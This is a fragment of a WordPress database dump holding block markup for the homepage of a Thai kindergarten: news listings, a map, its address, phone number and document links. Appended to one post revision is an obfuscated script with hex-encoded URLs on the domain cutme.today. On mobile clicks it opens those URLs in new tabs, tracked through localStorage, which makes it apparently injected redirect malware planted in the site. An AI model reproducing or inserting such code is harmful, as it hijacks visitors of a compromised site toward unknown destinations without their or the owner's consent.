{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:25:56','2024-08-29 07:25:56','',19,'http://watprato.ssk.in.th/?p=270',0,'revision','',0),
(271,2,'2024-08-29 14:26:27','2024-08-29 07:26:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 